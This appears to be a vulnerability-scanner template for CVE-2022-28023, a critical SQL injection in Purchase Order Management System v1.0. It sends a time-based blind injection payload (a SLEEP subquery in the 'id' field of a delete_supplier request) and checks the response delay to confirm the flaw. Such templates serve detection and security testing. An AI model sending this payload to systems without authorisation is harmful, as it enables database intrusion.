2023-06-05 07:03:16 +00:00
id : CVE-2022-28023
info :
name : Purchase Order Management v1.0 - SQL Injection
author : theamanrawat
severity : critical
description : |
Purchase Order Management System v1.0 was discovered to contain a SQL injection vulnerability via /purchase_order/classes/Master.php?f=delete_supplier.
reference :
- https://github.com/debug601/bug_report/blob/main/vendors/oretnom23/purchase-order-management-system/SQLi-2.md
- https://www.sourcecodester.com/php/14935/purchase-order-management-system-using-php-free-source-code.html
- https://nvd.nist.gov/vuln/detail/CVE-2022-28023
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score : 9.8
cve-id : CVE-2022-28023
cwe-id : CWE-89
metadata :
2023-06-05 07:27:06 +00:00
max-request : 1
2023-06-05 07:03:16 +00:00
verified : "true"
tags : cve,cve2022,sqli,purchase-order,poms
http :
- raw :
- |
POST /classes/Master.php?f=delete_supplier HTTP/1.1
Host : {{Hostname}}
Content-Type : application/x-www-form-urlencoded; charset=UTF-8
id=aman'+AND+(SELECT+2844+FROM+(SELECT(SLEEP(6)))FDTM)+AND+'sWZA'='sWZA
matchers :
- type : dsl
dsl :
- 'duration>=6'
- 'status_code == 200'
- 'contains(header, "text/html")'
- 'contains(body, "status\":\"success")'
condition : and